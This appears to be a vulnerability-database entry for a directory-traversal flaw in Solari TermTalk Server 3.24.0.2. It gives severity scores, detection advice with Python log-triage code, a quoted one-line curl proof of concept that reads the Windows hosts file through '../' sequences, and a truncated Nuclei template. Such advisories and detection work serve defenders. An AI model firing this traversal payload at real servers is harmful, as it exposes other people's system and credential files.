CVE-2021-35380
Published 2022-02-15
Priority P270 · high · 7.5 (CVSS 3.1)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EXPLOIT
EPSS: 38.95% (98.4th percentile)
A Directory Traversal vulnerability exists in Solari di Udine TermTalk Server (TTServer) 3.24.0.2, which lets an unauthenticated malicious user gain access to the files on the remote system by gaining access to the relative path of the file they want to download (http://url:port/file?valore).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| solari | termtalk_server | — | — |
Detection & IOCs
- Detect unauthenticated GET requests to the /file endpoint with a 'valore' parameter containing directory traversal sequences (e.g., '../') targeting TermTalk Server.
- HTTP response body containing all three strings 'bit app support', 'fonts', and 'extensions' simultaneously indicates successful exploitation via win.ini file read.
- Flag GET requests where the 'valore' query parameter traverses outside the web root (multiple '../' sequences) on any host running TermTalk Server 3.24.0.2; no authentication is required by the attacker.
- The vulnerability is fixed in TermTalk Server version 3.26.1.7; detections should be scoped to instances running version 3.24.0.2 or earlier.
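
The checks listed above, sketched as log-triage code. This is an added example, not a rule from the vendor or from any of the indexed sources; it assumes requests are recorded in common/combined access-log format (for instance by a reverse proxy in front of TTServer), and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request field of a common/combined access-log line (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
WIN_INI_MARKERS = ("bit app support", "fonts", "extensions")

# Constructed sample lines; addresses are from the documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Jan/2022:10:00:01 +0000] "GET /file?valore=../../../../WINDOWS/System32/drivers/etc/hosts HTTP/1.1" 200 824',
    '192.0.2.11 - - [05/Jan/2022:10:00:05 +0000] "GET /file?valore=..%2f..%2f..%2fwindows%2fwin.ini HTTP/1.1" 200 92',
    '192.0.2.12 - - [05/Jan/2022:10:00:09 +0000] "GET /file?valore=images/logo.png HTTP/1.1" 200 5120',
    '192.0.2.13 - - [05/Jan/2022:10:00:12 +0000] "GET /file?valore=docs/../readme.txt HTTP/1.1" 200 300',
]


def escapes_root(value: str) -> bool:
    """True if the relative path climbs above the directory it starts in."""
    for _ in range(3):  # peel nested percent-encoding such as %252e%252e
        value = unquote(value)
    depth = 0
    for part in value.replace("\\", "/").split("/"):
        if part == "..":
            depth -= 1
            if depth < 0:  # more '..' than directories entered so far
                return True
        elif part not in ("", "."):
            depth += 1
    return False


def is_traversal_request(log_line: str) -> bool:
    """Flag GET /file requests whose 'valore' value leaves the served root."""
    m = REQUEST_RE.search(log_line)
    if not m or m.group("method") != "GET":
        return False
    url = urlsplit(m.group("target"))
    if url.path.rstrip("/").lower() != "/file":
        return False
    values = parse_qs(url.query, keep_blank_values=True).get("valore", [])
    return any(escapes_root(v) for v in values)


def looks_like_win_ini(body: str) -> bool:
    """Response-side check: all three win.ini markers present at once."""
    return all(marker in body.lower() for marker in WIN_INI_MARKERS)
```

Counting path depth rather than matching the literal string '../' keeps benign values such as `docs/../readme.txt` from alerting while still catching encoded separators.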
CVSS provenance
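| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |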
No detection rules found.
Exploit-DB
TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
exploitdb·2022-01-05
---
```
# Exploit Title: TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
# Date: 03/01/2022
# Exploit Author: Fabiano Golluscio @ Swascan
# Vendor Homepage: https://www.solari.it/it/
# Software Link: https://www.solari.it/it/solutions/other-solutions/access-control/
# Version: 3.24.0.2
# Fixed Version: 3.26.1.7
# Reference: https://www.swascan.com/solari-di-udine/
POC
curl http://url:port/file?valore=../../../../WINDOWS/System32/drivers/etc/hosts
```
Nuclei
TermTalk Server 3.24.0.2 - Local File Inclusion
nuclei·CVSS 7.5
TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion, which allows an unauthenticated malicious user to gain access to files on the remote system by providing the relative path of the file they want to retrieve.
Template:
```yaml
id: CVE-2021-35380

info:
  name: TermTalk Server 3.24.0.2 - Local File Inclusion
  author: fxploit
  severity: high
  description: |
    TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, a
```
No writeups or analysis indexed.